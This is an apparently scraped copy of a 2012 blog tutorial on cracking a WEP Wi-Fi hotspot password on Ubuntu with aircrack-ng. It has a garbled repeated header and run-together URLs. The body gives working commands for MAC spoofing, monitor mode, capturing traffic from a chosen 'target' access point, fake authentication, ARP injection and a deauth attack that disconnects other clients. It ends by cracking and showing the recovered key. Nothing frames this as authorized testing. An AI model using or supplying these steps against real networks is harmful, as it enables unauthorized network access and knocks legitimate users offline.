crack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kkcrack kk
TRANSCRIPT
-
7/28/2019 Crack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack Kk
1/4
How to Crack WEP Hotspot Password Using Ubuntu
Bykumkumon Jan 20, 2012 -Comments: 7- Today view: 6 - Total view:
1,510
Hardware requirement:
WiFi adapter supported by Aircrack-ng. In this guide, we will use
Linksys WiFi USB adapter.
Software requirement:
Ubuntu 10.10 Aircrack-ng
Terminal / Konsole
How to:
1. Install aircrack-ng and macchanger
$ sudo apt-get install aircrack-ng macchanger
2. Make sure WiFi adapter is plugged into PC. Check WiFi interface:
$ ifconfig
If your WiFi interface is wlan0, stop the interface using this command:
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger --mac 00:11:22:33:44:55 wlan0
Here we setup fake mac address 00:11:22:33:44:55 into the WiFi adapter.
This fake mac address is optional and only be used when you want to spoof
your real mac address. Otherwise you can use your WiFi adapter mac
address. Check your adapter mac address using ifconfig command.
3. Put wlan0 interface into monitor mode.
$ airmon-ng start wlan0
http://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/http://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/http://colekcolek.com/author/admin/http://colekcolek.com/author/admin/http://colekcolek.com/author/admin/http://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/#commentshttp://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/#commentshttp://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/#commentshttp://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/#commentshttp://colekcolek.com/author/admin/http://colekcolek.com/2012/01/20/crack-wep-hotspot-password-ubuntu/ -
7/28/2019 Crack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack Kk
2/4
This command will output:
Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0]
(monitor mode enabled on mon0)
From here, we will use mon0 interface, not wlan0.
4. Run this command to show list of nearby access point.
$ airodump-ng mon0
The following are important columns you have to note:
BSSID = target access points mac address
PWR = signal strength, the lower the value the nearer the access point
#Data = number of data traffic captured
CH = channel
ENC = encryption type
ESSID = access point name
STATION = connected clients mac address
Here we choose yoyo access point as target.
5. Open terminal / konsole and run this command:
http://colekcolek.com/wp-content/uploads/2012/01/wepcrack02.jpg -
7/28/2019 Crack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack Kk
3/4
$ airodump-ng -c 3 -w the_result --bssid 99:88:77:66:55:44 mon0
Parameter -c 3 shows that access point 99:88:77:66:55:44 is using
channel 3.
Parameter -w the_result shows the file name where we want to save
captured data.
Let this terminal / konsole window opens, then we open anotherterminal /konsole window to fake BSSID authentication.
6. Run this command to fake BSSID authentication
$ aireplay-ng -1 0 -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 -e yoyo mon0
Make sure you got message Association successful.
If not success, change target to another access point. Go to step 4.
7. Run this command to do ARP injection
$ aireplay-ng -3 -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0
The purpose of ARP injection is to make the data flow faster, so we can
have enough data to crack later.
This ARP injection will create very fast read-write activity and it is possible
that this thing will make another client unable to connect to the accesspoint.
There is another extreme way, by doing deauth attack. Using deauth attack,
we force connected client to disconnect from access point. The
disconnected client then will try to autoconnect to the access point. These
connect-and-disconnect activities will create many traffic that we can
capture. This is the command for deauth attack:
http://colekcolek.com/wp-content/uploads/2012/01/wepcrack03.jpg -
7/28/2019 Crack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack KkCrack Kk
4/4
$ aireplay-ng --deauth 0 -a aa:bb:cc:dd:ee:ff mon0
Mac address aa:bb:cc:dd:ee:ff is belong to the connected client. This mac
address will be shown in the terminal window on station column where we
get list of access points.
Minimum IV data (IV = Initialization Vector) required to do WEP cracking is
around 10.000. If#Data column shows number greater than 10.000 (bigger
is better) we can stop the monitoring process.
8. After that we can crack the_result file.
$ aircrack-ng -b 99:88:77:66:55:44 the_result.cap
There will be output to terminal window: KEY FOUND [ 5F:81:BD:13:1F ]
We combine the hex characters and it will be the WEP
password: 5F81BD131F